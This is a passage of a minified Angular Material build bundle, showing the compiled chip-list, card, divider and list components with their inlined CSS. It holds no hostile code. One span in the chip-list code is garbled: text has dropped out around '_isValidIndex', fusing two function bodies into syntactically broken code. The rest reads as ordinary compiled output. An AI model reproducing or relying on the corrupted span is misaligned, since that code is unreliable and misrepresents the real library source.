selectable(){return this._selectable}set selectable(e){this._selectable=wi(e),this._syncChipsState()}set tabIndex(e){this._userTabIndex=e,this._tabIndex=e}get chipSelectionChanges(){return ra(...this.chips.map(e=>e.selectionChange))}get chipFocusChanges(){return ra(...this.chips.map(e=>e._onFocus))}get chipBlurChanges(){return ra(...this.chips.map(e=>e._onBlur))}get chipRemoveChanges(){return ra(...this.chips.map(e=>e.destroyed))}ngAfterContentInit(){this._keyManager=new L1(this.chips).withWrap().withVerticalOrientation().withHomeAndEnd().withHorizontalOrientation(this._dir?this._dir.value:"ltr"),this._dir&&this._dir.change.pipe(ea(this._destroyed)).subscribe(e=>this._keyManager.withHorizontalOrientation(e)),this._keyManager.tabOut.pipe(ea(this._destroyed)).subscribe(()=>{this._allowFocusEscape()}),this.chips.changes.pipe(Ro(null),ea(this._destroyed)).subscribe(()=>{(this.disabled||!this.selectable)&&Promise.resolve().then(()=>{this._syncChipsState()}),this._resetChips(),this._initializeSelection(),this._updateTabIndex(),this._updateFocusForDestroyedChips(),this.stateChanges.next()})}ngOnInit(){this._selectionModel=new I1(this.multiple,void 0,!1),this.stateChanges.next()}ngDoCheck(){this.ngControl&&(this.updateErrorState(),this.ngControl.disabled!==this._disabled&&(this.disabled=!!this.ngControl.disabled))}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete(),this.stateChanges.complete(),this._dropSubscriptions()}registerInput(e){this._chipInput=e,this._elementRef.nativeElement.setAttribute("data-mat-chip-input",e.id)}setDescribedByIds(e){e.length?this._elementRef.nativeElement.setAttribute("aria-describedby",e.join(" ")):this._elementRef.nativeElement.removeAttribute("aria-describedby")}writeValue(e){this.chips&&this._setSelectionByValue(e,!1)}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e,this.stateChanges.next()}onContainerClick(e){this._originatesFromChip(e)||this.focus()}focus(e){this.disabled||this._chipInput&&this._chipInput.focused||(this.chips.length>0?(this._keyManager.setFirstItemActive(),this.stateChanges.next()):(this._focusInput(e),this.stateChanges.next()))}_focusInput(e){this._chipInput&&this._chipInput.focus(e)}_keydown(e){const i=e.target;i&&i.classList.contains("mat-chip")&&(this._keyManager.onKeydown(e),this.stateChanges.next())}_updateTabIndex(){this._tabIndex=this._userTabIndex||(0===this.chips.length?-1:0)}_updateFocusForDestroyedChips(){if(null!=this._lastDestroyedChipIndex)if(this.chips.length){const e=Math.min(this._lastDestroyedChipIndex,this.chips.length-1);this._keyManager.setActiveItem(e)}else this.focus();this._lastDestroyedChipIndex=null}_isValidIndex(e){return e>=0&&en.deselect()),Array.isArray(e))e.forEach(n=>this._selectValue(n,i)),this._sortValues();else{const n=this._selectValue(e,i);n&&i&&this._keyManager.setActiveItem(n)}}_selectValue(e,i=!0){const n=this.chips.find(r=>null!=r.value&&this._compareWith(r.value,e));return n&&(i?n.selectViaInteraction():n.select(),this._selectionModel.select(n)),n}_initializeSelection(){Promise.resolve().then(()=>{(this.ngControl||this._value)&&(this._setSelectionByValue(this.ngControl?this.ngControl.value:this._value,!1),this.stateChanges.next())})}_clearSelection(e){this._selectionModel.clear(),this.chips.forEach(i=>{i!==e&&i.deselect()}),this.stateChanges.next()}_sortValues(){this._multiple&&(this._selectionModel.clear(),this.chips.forEach(e=>{e.selected&&this._selectionModel.select(e)}),this.stateChanges.next())}_propagateChanges(e){let i=null;i=Array.isArray(this.selected)?this.selected.map(n=>n.value):this.selected?this.selected.value:e,this._value=i,this.change.emit(new G0e(this,i)),this.valueChange.emit(i),this._onChange(i),this._changeDetectorRef.markForCheck()}_blur(){this._hasFocusedChip()||this._keyManager.setActiveItem(-1),this.disabled||(this._chipInput?setTimeout(()=>{this.focused||this._markAsTouched()}):this._markAsTouched())}_markAsTouched(){this._onTouched(),this._changeDetectorRef.markForCheck(),this.stateChanges.next()}_allowFocusEscape(){-1!==this._tabIndex&&(this._tabIndex=-1,setTimeout(()=>{this._tabIndex=this._userTabIndex||0,this._changeDetectorRef.markForCheck()}))}_resetChips(){this._dropSubscriptions(),this._listenToChipsFocus(),this._listenToChipsSelection(),this._listenToChipsRemoved()}_dropSubscriptions(){this._chipFocusSubscription&&(this._chipFocusSubscription.unsubscribe(),this._chipFocusSubscription=null),this._chipBlurSubscription&&(this._chipBlurSubscription.unsubscribe(),this._chipBlurSubscription=null),this._chipSelectionSubscription&&(this._chipSelectionSubscription.unsubscribe(),this._chipSelectionSubscription=null),this._chipRemoveSubscription&&(this._chipRemoveSubscription.unsubscribe(),this._chipRemoveSubscription=null)}_listenToChipsSelection(){this._chipSelectionSubscription=this.chipSelectionChanges.subscribe(e=>{e.source.selected?this._selectionModel.select(e.source):this._selectionModel.deselect(e.source),this.multiple||this.chips.forEach(i=>{!this._selectionModel.isSelected(i)&&i.selected&&i.deselect()}),e.isUserInput&&this._propagateChanges()})}_listenToChipsFocus(){this._chipFocusSubscription=this.chipFocusChanges.subscribe(e=>{let i=this.chips.toArray().indexOf(e.chip);this._isValidIndex(i)&&this._keyManager.updateActiveItem(i),this.stateChanges.next()}),this._chipBlurSubscription=this.chipBlurChanges.subscribe(()=>{this._blur(),this.stateChanges.next()})}_listenToChipsRemoved(){this._chipRemoveSubscription=this.chipRemoveChanges.subscribe(e=>{const i=e.chip,n=this.chips.toArray().indexOf(e.chip);this._isValidIndex(n)&&i._hasFocus&&(this._lastDestroyedChipIndex=n)})}_originatesFromChip(e){let i=e.target;for(;i&&i!==this._elementRef.nativeElement;){if(i.classList.contains("mat-chip"))return!0;i=i.parentElement}return!1}_hasFocusedChip(){return this.chips&&this.chips.some(e=>e._hasFocus)}_syncChipsState(){this.chips&&this.chips.forEach(e=>{e._chipListDisabled=this._disabled,e._chipListMultiple=this.multiple,e.chipListSelectable=this._selectable})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(Cr,8),Ee(y1,8),Ee(lg,8),Ee(mp),Ee(fm,10))},t.\u0275cmp=Wt({type:t,selectors:[["mat-chip-list"]],contentQueries:function(e,i,n){if(1&e&&fa(n,db,5),2&e){let r;Vt(r=Bt())&&(i.chips=r)}},hostAttrs:[1,"mat-chip-list"],hostVars:14,hostBindings:function(e,i){1&e&&he("focus",function(){return i.focus()})("blur",function(){return i._blur()})("keydown",function(r){return i._keydown(r)}),2&e&&(Gs("id",i._uid),Rt("tabindex",i.disabled?null:i._tabIndex)("aria-required",i.role?i.required:null)("aria-disabled",i.disabled.toString())("aria-invalid",i.errorState)("aria-multiselectable",i.multiple)("role",i.role)("aria-orientation",i.ariaOrientation),Ct("mat-chip-list-disabled",i.disabled)("mat-chip-list-invalid",i.errorState)("mat-chip-list-required",i.required))},inputs:{role:"role",userAriaDescribedBy:["aria-describedby","userAriaDescribedBy"],errorStateMatcher:"errorStateMatcher",multiple:"multiple",compareWith:"compareWith",value:"value",required:"required",placeholder:"placeholder",disabled:"disabled",ariaOrientation:["aria-orientation","ariaOrientation"],selectable:"selectable",tabIndex:"tabIndex"},outputs:{change:"change",valueChange:"valueChange"},exportAs:["matChipList"],features:[ki([{provide:sb,useExisting:t}]),ci],ngContentSelectors:z0e,decls:2,vars:0,consts:[[1,"mat-chip-list-wrapper"]],template:function(e,i){1&e&&(Jn(),m(0,"div",0),va(1),u())},styles:['.mat-chip{position:relative;box-sizing:border-box;-webkit-tap-highlight-color:rgba(0,0,0,0);border:none;-webkit-appearance:none;-moz-appearance:none}.mat-chip::before{margin:calc(calc(var(--mat-focus-indicator-border-width, 3px) + 2px) * -1)}.mat-standard-chip{transition:box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);display:inline-flex;padding:7px 12px;border-radius:16px;align-items:center;cursor:default;min-height:32px;height:1px}.mat-standard-chip._mat-animation-noopable{transition:none !important;animation:none !important}.mat-standard-chip .mat-chip-remove{border:none;-webkit-appearance:none;-moz-appearance:none;padding:0;background:none}.mat-standard-chip .mat-chip-remove.mat-icon,.mat-standard-chip .mat-chip-remove .mat-icon{width:18px;height:18px;font-size:18px}.mat-standard-chip::after{top:0;left:0;right:0;bottom:0;position:absolute;border-radius:inherit;opacity:0;content:"";pointer-events:none;transition:opacity 200ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-standard-chip:hover::after{opacity:.12}.mat-standard-chip:focus{outline:none}.mat-standard-chip:focus::after{opacity:.16}.cdk-high-contrast-active .mat-standard-chip{outline:solid 1px}.cdk-high-contrast-active .mat-standard-chip.mat-chip-selected{outline-width:3px}.mat-standard-chip.mat-chip-disabled::after{opacity:0}.mat-standard-chip.mat-chip-disabled .mat-chip-remove,.mat-standard-chip.mat-chip-disabled .mat-chip-trailing-icon{cursor:default}.mat-standard-chip.mat-chip-with-trailing-icon.mat-chip-with-avatar,.mat-standard-chip.mat-chip-with-avatar{padding-top:0;padding-bottom:0}.mat-standard-chip.mat-chip-with-trailing-icon.mat-chip-with-avatar{padding-right:8px;padding-left:0}[dir=rtl] .mat-standard-chip.mat-chip-with-trailing-icon.mat-chip-with-avatar{padding-left:8px;padding-right:0}.mat-standard-chip.mat-chip-with-trailing-icon{padding-top:7px;padding-bottom:7px;padding-right:8px;padding-left:12px}[dir=rtl] .mat-standard-chip.mat-chip-with-trailing-icon{padding-left:8px;padding-right:12px}.mat-standard-chip.mat-chip-with-avatar{padding-left:0;padding-right:12px}[dir=rtl] .mat-standard-chip.mat-chip-with-avatar{padding-right:0;padding-left:12px}.mat-standard-chip .mat-chip-avatar{width:24px;height:24px;margin-right:8px;margin-left:4px}[dir=rtl] .mat-standard-chip .mat-chip-avatar{margin-left:8px;margin-right:4px}.mat-standard-chip .mat-chip-remove,.mat-standard-chip .mat-chip-trailing-icon{width:18px;height:18px;cursor:pointer}.mat-standard-chip .mat-chip-remove,.mat-standard-chip .mat-chip-trailing-icon{margin-left:8px;margin-right:0}[dir=rtl] .mat-standard-chip .mat-chip-remove,[dir=rtl] .mat-standard-chip .mat-chip-trailing-icon{margin-right:8px;margin-left:0}.mat-chip-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none;border-radius:inherit;overflow:hidden;transform:translateZ(0)}.mat-chip-list-wrapper{display:flex;flex-direction:row;flex-wrap:wrap;align-items:center;margin:-4px}.mat-chip-list-wrapper input.mat-input-element,.mat-chip-list-wrapper .mat-standard-chip{margin:4px}.mat-chip-list-stacked .mat-chip-list-wrapper{flex-direction:column;align-items:flex-start}.mat-chip-list-stacked .mat-chip-list-wrapper .mat-standard-chip{width:100%}.mat-chip-avatar{border-radius:50%;justify-content:center;align-items:center;display:flex;overflow:hidden;object-fit:cover}input.mat-chip-input{width:150px;margin:4px;flex:1 0 150px}'],encapsulation:2,changeDetection:0}),t})(),BF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[mp,{provide:FF,useValue:{separatorKeyCodes:[13]}}],imports:[la]}),t})();const j0e=["*",[["mat-card-footer"]]],Q0e=["*","mat-card-footer"];let HF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-card-content"],["","mat-card-content",""],["","matCardContent",""]],hostAttrs:[1,"mat-card-content"]}),t})(),UF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-card-title"],["","mat-card-title",""],["","matCardTitle",""]],hostAttrs:[1,"mat-card-title"]}),t})(),$0e=(()=>{class t{constructor(){this.align="start"}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-card-actions"]],hostAttrs:[1,"mat-card-actions"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-card-actions-align-end","end"===i.align)},inputs:{align:"align"},exportAs:["matCardActions"]}),t})(),qF=(()=>{class t{constructor(e){this._animationMode=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-card"]],hostAttrs:[1,"mat-card","mat-focus-indicator"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode)},exportAs:["matCard"],ngContentSelectors:Q0e,decls:2,vars:0,template:function(e,i){1&e&&(Jn(j0e),va(0),va(1,1))},styles:[".mat-card{transition:box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);display:block;position:relative;padding:16px;border-radius:4px}.mat-card._mat-animation-noopable{transition:none !important;animation:none !important}.mat-card>.mat-divider-horizontal{position:absolute;left:0;width:100%}[dir=rtl] .mat-card>.mat-divider-horizontal{left:auto;right:0}.mat-card>.mat-divider-horizontal.mat-divider-inset{position:static;margin:0}[dir=rtl] .mat-card>.mat-divider-horizontal.mat-divider-inset{margin-right:0}.cdk-high-contrast-active .mat-card{outline:solid 1px}.mat-card-actions,.mat-card-subtitle,.mat-card-content{display:block;margin-bottom:16px}.mat-card-title{display:block;margin-bottom:8px}.mat-card-actions{margin-left:-8px;margin-right:-8px;padding:8px 0}.mat-card-actions-align-end{display:flex;justify-content:flex-end}.mat-card-image{width:calc(100% + 32px);margin:0 -16px 16px -16px;display:block;overflow:hidden}.mat-card-image img{width:100%}.mat-card-footer{display:block;margin:0 -16px -16px -16px}.mat-card-actions .mat-button,.mat-card-actions .mat-raised-button,.mat-card-actions .mat-stroked-button{margin:0 8px}.mat-card-header{display:flex;flex-direction:row}.mat-card-header .mat-card-title{margin-bottom:12px}.mat-card-header-text{margin:0 16px}.mat-card-avatar{height:40px;width:40px;border-radius:50%;flex-shrink:0;object-fit:cover}.mat-card-title-group{display:flex;justify-content:space-between}.mat-card-sm-image{width:80px;height:80px}.mat-card-md-image{width:112px;height:112px}.mat-card-lg-image{width:152px;height:152px}.mat-card-xl-image{width:240px;height:240px;margin:-8px}.mat-card-title-group>.mat-card-xl-image{margin:-8px 0 8px}@media(max-width: 599px){.mat-card-title-group{margin:0}.mat-card-xl-image{margin-left:0;margin-right:0}}.mat-card>:first-child,.mat-card-content>:first-child{margin-top:0}.mat-card>:last-child:not(.mat-card-footer),.mat-card-content>:last-child:not(.mat-card-footer){margin-bottom:0}.mat-card-image:first-child{margin-top:-16px;border-top-left-radius:inherit;border-top-right-radius:inherit}.mat-card>.mat-card-actions:last-child{margin-bottom:-8px;padding-bottom:0}.mat-card-actions:not(.mat-card-actions-align-end) .mat-button:first-child,.mat-card-actions:not(.mat-card-actions-align-end) .mat-raised-button:first-child,.mat-card-actions:not(.mat-card-actions-align-end) .mat-stroked-button:first-child{margin-left:0;margin-right:0}.mat-card-actions-align-end .mat-button:last-child,.mat-card-actions-align-end .mat-raised-button:last-child,.mat-card-actions-align-end .mat-stroked-button:last-child{margin-left:0;margin-right:0}.mat-card-title:not(:first-child),.mat-card-subtitle:not(:first-child){margin-top:-4px}.mat-card-header .mat-card-subtitle:not(:first-child){margin-top:-8px}.mat-card>.mat-card-xl-image:first-child{margin-top:-8px}.mat-card>.mat-card-xl-image:last-child{margin-bottom:-8px}"],encapsulation:2,changeDetection:0}),t})(),aA=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})(),pp=(()=>{class t{constructor(){this._vertical=!1,this._inset=!1}get vertical(){return this._vertical}set vertical(e){this._vertical=wi(e)}get inset(){return this._inset}set inset(e){this._inset=wi(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["mat-divider"]],hostAttrs:["role","separator",1,"mat-divider"],hostVars:7,hostBindings:function(e,i){2&e&&(Rt("aria-orientation",i.vertical?"vertical":"horizontal"),Ct("mat-divider-vertical",i.vertical)("mat-divider-horizontal",!i.vertical)("mat-divider-inset",i.inset))},inputs:{vertical:"vertical",inset:"inset"},decls:0,vars:0,template:function(e,i){},styles:[".mat-divider{display:block;margin:0;border-top-width:1px;border-top-style:solid}.mat-divider.mat-divider-vertical{border-top:0;border-right-width:1px;border-right-style:solid}.mat-divider.mat-divider-inset{margin-left:80px}[dir=rtl] .mat-divider.mat-divider-inset{margin-left:auto;margin-right:80px}"],encapsulation:2,changeDetection:0}),t})(),u8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})();const GF=["*"],K0e=[[["","mat-list-avatar",""],["","mat-list-icon",""],["","matListAvatar",""],["","matListIcon",""]],[["","mat-line",""],["","matLine",""]],"*"],X0e=["[mat-list-avatar], [mat-list-icon], [matListAvatar], [matListIcon]","[mat-line], [matLine]","*"],t1e=Zc(El(class{})),i1e=El(class{}),QF=new ni("MatList"),a1e=new ni("MatNavList");let ts=(()=>{class t extends t1e{constructor(e){super(),this._elementRef=e,this._stateChanges=new J,"action-list"===this._getListType()&&(e.nativeElement.classList.add("mat-action-list"),e.nativeElement.setAttribute("role","group"))}_getListType(){const e=this._elementRef.nativeElement.nodeName.toLowerCase();return"mat-list"===e?"list":"mat-action-list"===e?"action-list":null}ngOnChanges(){this._stateChanges.next()}ngOnDestroy(){this._stateChanges.complete()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["mat-list"],["mat-action-list"]],hostAttrs:[1,"mat-list","mat-list-base"],inputs:{disableRipple:"disableRipple",disabled:"disabled"},exportAs:["matList"],features:[ki([{provide:QF,useExisting:t}]),ci,sa],ngContentSelectors:GF,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},styles:['.mat-subheader{display:flex;box-sizing:border-box;padding:16px;align-items:center}.mat-list-base .mat-subheader{margin:0}button.mat-list-item,button.mat-list-option{padding:0;width:100%;background:none;color:inherit;border:none;outline:inherit;-webkit-tap-highlight-color:rgba(0,0,0,0);text-align:left}[dir=rtl] button.mat-list-item,[dir=rtl] button.mat-list-option{text-align:right}button.mat-list-item::-moz-focus-inner,button.mat-list-option::-moz-focus-inner{border:0}.mat-list-base{padding-top:8px;display:block;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-list-base .mat-subheader{height:48px;line-height:16px}.mat-list-base .mat-subheader:first-child{margin-top:-8px}.mat-list-base .mat-list-item,.mat-list-base .mat-list-option{display:block;height:48px;-webkit-tap-highlight-color:rgba(0,0,0,0);width:100%;padding:0}.mat-list-base .mat-list-item .mat-list-item-content,.mat-list-base .mat-list-option .mat-list-item-content{display:flex;flex-direction:row;align-items:center;box-sizing:border-box;padding:0 16px;position:relative;height:inherit}.mat-list-base .mat-list-item .mat-list-item-content-reverse,.mat-list-base .mat-list-option .mat-list-item-content-reverse{display:flex;align-items:center;padding:0 16px;flex-direction:row-reverse;justify-content:space-around}.mat-list-base .mat-list-item .mat-list-item-ripple,.mat-list-base .mat-list-option .mat-list-item-ripple{display:block;top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-list-base .mat-list-item.mat-list-item-with-avatar,.mat-list-base .mat-list-option.mat-list-item-with-avatar{height:56px}.mat-list-base .mat-list-item.mat-2-line,.mat-list-base .mat-list-option.mat-2-line{height:72px}.mat-list-base .mat-list-item.mat-3-line,.mat-list-base .mat-list-option.mat-3-line{height:88px}.mat-list-base .mat-list-item.mat-multi-line,.mat-list-base .mat-list-option.mat-multi-line{height:auto}.mat-list-base .mat-list-item.mat-multi-line .mat-list-item-content,.mat-list-base .mat-list-option.mat-multi-line .mat-list-item-content{padding-top:16px;padding-bottom:16px}.mat-list-base .mat-list-item .mat-list-text,.mat-list-base .mat-list-option .mat-list-text{display:flex;flex-direction:column;flex:auto;box-sizing:border-box;overflow:hidden;padding:0}.mat-list-base .mat-list-item .mat-list-text>*,.mat-list-base .mat-list-option .mat-list-text>*{margin:0;padding:0;font-weight:normal;font-size:inherit}.mat-list-base .mat-list-item .mat-list-text:empty,.mat-list-base .mat-list-option .mat-list-text:empty{display:none}.mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:0;padding-left:16px}[dir=rtl] .mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:0}.mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-left:0;padding-right:16px}[dir=rtl] .mat-list-base .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-right:0;padding-left:16px}.mat-list-base .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:16px}.mat-list-base .mat-list-item .mat-list-avatar,.mat-list-base .mat-list-option .mat-list-avatar{flex-shrink:0;width:40px;height:40px;border-radius:50%;object-fit:cover}.mat-list-base .mat-list-item .mat-list-avatar~.mat-divider-inset,.mat-list-base .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:72px;width:calc(100% - 72px)}[dir=rtl] .mat-list-base .mat-list-item .mat-list-avatar~.mat-divider-inset,[dir=rtl] .mat-list-base .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:auto;margin-right:72px}.mat-list-base .mat-list-item .mat-list-icon,.mat-list-base .mat-list-option .mat-list-icon{flex-shrink:0;width:24px;height:24px;font-size:24px;box-sizing:content-box;border-radius:50%;padding:4px}.mat-list-base .mat-list-item .mat-list-icon~.mat-divider-inset,.mat-list-base .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:64px;width:calc(100% - 64px)}[dir=rtl] .mat-list-base .mat-list-item .mat-list-icon~.mat-divider-inset,[dir=rtl] .mat-list-base .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:auto;margin-right:64px}.mat-list-base .mat-list-item .mat-divider,.mat-list-base .mat-list-option .mat-divider{position:absolute;bottom:0;left:0;width:100%;margin:0}[dir=rtl] .mat-list-base .mat-list-item .mat-divider,[dir=rtl] .mat-list-base .mat-list-option .mat-divider{margin-left:auto;margin-right:0}.mat-list-base .mat-list-item .mat-divider.mat-divider-inset,.mat-list-base .mat-list-option .mat-divider.mat-divider-inset{position:absolute}.mat-list-base[dense]{padding-top:4px;display:block}.mat-list-base[dense] .mat-subheader{height:40px;line-height:8px}.mat-list-base[dense] .mat-subheader:first-child{margin-top:-4px}.mat-list-base[dense] .mat-list-item,.mat-list-base[dense] .mat-list-option{display:block;height:40px;-webkit-tap-highlight-color:rgba(0,0,0,0);width:100%;padding:0}.mat-list-base[dense] .mat-list-item .mat-list-item-content,.mat-list-base[dense] .mat-list-option .mat-list-item-content{display:flex;flex-direction:row;align-items:center;box-sizing:border-box;padding:0 16px;position:relative;height:inherit}.mat-list-base[dense] .mat-list-item .mat-list-item-content-reverse,.mat-list-base[dense] .mat-list-option .mat-list-item-content-reverse{display:flex;align-items:center;padding:0 16px;flex-direction:row-reverse;justify-content:space-around}.mat-list-base[dense] .mat-list-item .mat-list-item-ripple,.mat-list-base[dense] .mat-list-option .mat-list-item-ripple{display:block;top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar{height:48px}.mat-list-base[dense] .mat-list-item.mat-2-line,.mat-list-base[dense] .mat-list-option.mat-2-line{height:60px}.mat-list-base[dense] .mat-list-item.mat-3-line,.mat-list-base[dense] .mat-list-option.mat-3-line{height:76px}.mat-list-base[dense] .mat-list-item.mat-multi-line,.mat-list-base[dense] .mat-list-option.mat-multi-line{height:auto}.mat-list-base[dense] .mat-list-item.mat-multi-line .mat-list-item-content,.mat-list-base[dense] .mat-list-option.mat-multi-line .mat-list-item-content{padding-top:16px;padding-bottom:16px}.mat-list-base[dense] .mat-list-item .mat-list-text,.mat-list-base[dense] .mat-list-option .mat-list-text{display:flex;flex-direction:column;flex:auto;box-sizing:border-box;overflow:hidden;padding:0}.mat-list-base[dense] .mat-list-item .mat-list-text>*,.mat-list-base[dense] .mat-list-option .mat-list-text>*{margin:0;padding:0;font-weight:normal;font-size:inherit}.mat-list-base[dense] .mat-list-item .mat-list-text:empty,.mat-list-base[dense] .mat-list-option .mat-list-text:empty{display:none}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:0;padding-left:16px}[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:0}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-left:0;padding-right:16px}[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-item.mat-list-option .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar .mat-list-item-content-reverse .mat-list-text,[dir=rtl] .mat-list-base[dense] .mat-list-option.mat-list-option .mat-list-item-content-reverse .mat-list-text{padding-right:0;padding-left:16px}.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-item.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content-reverse .mat-list-text,.mat-list-base[dense] .mat-list-option.mat-list-item-with-avatar.mat-list-option .mat-list-item-content .mat-list-text{padding-right:16px;padding-left:16px}.mat-list-base[dense] .mat-list-item .mat-list-avatar,.mat-list-base[dense] .mat-list-option .mat-list-avatar{flex-shrink:0;width:36px;height:36px;border-radius:50%;object-fit:cover}.mat-list-base[dense] .mat-list-item .mat-list-avatar~.mat-divider-inset,.mat-list-base[dense] .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:68px;width:calc(100% - 68px)}[dir=rtl] .mat-list-base[dense] .mat-list-item .mat-list-avatar~.mat-divider-inset,[dir=rtl] .mat-list-base[dense] .mat-list-option .mat-list-avatar~.mat-divider-inset{margin-left:auto;margin-right:68px}.mat-list-base[dense] .mat-list-item .mat-list-icon,.mat-list-base[dense] .mat-list-option .mat-list-icon{flex-shrink:0;width:20px;height:20px;font-size:20px;box-sizing:content-box;border-radius:50%;padding:4px}.mat-list-base[dense] .mat-list-item .mat-list-icon~.mat-divider-inset,.mat-list-base[dense] .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:60px;width:calc(100% - 60px)}[dir=rtl] .mat-list-base[dense] .mat-list-item .mat-list-icon~.mat-divider-inset,[dir=rtl] .mat-list-base[dense] .mat-list-option .mat-list-icon~.mat-divider-inset{margin-left:auto;margin-right:60px}.mat-list-base[dense] .mat-list-item .mat-divider,.mat-list-base[dense] .mat-list-option .mat-divider{position:absolute;bottom:0;left:0;width:100%;margin:0}[dir=rtl] .mat-list-base[dense] .mat-list-item .mat-divider,[dir=rtl] .mat-list-base[dense] .mat-list-option .mat-divider{margin-left:auto;margin-right:0}.mat-list-base[dense] .mat-list-item .mat-divider.mat-divider-inset,.mat-list-base[dense] .mat-list-option .mat-divider.mat-divider-inset{position:absolute}.mat-nav-list a{text-decoration:none;color:inherit}.mat-nav-list .mat-list-item{cursor:pointer;outline:none}mat-action-list .mat-list-item{cursor:pointer;outline:inherit}.mat-list-option:not(.mat-list-item-disabled){cursor:pointer;outline:none}.mat-list-item-disabled{pointer-events:none}.cdk-high-contrast-active .mat-list-item-disabled{opacity:.5}.cdk-high-contrast-active :host 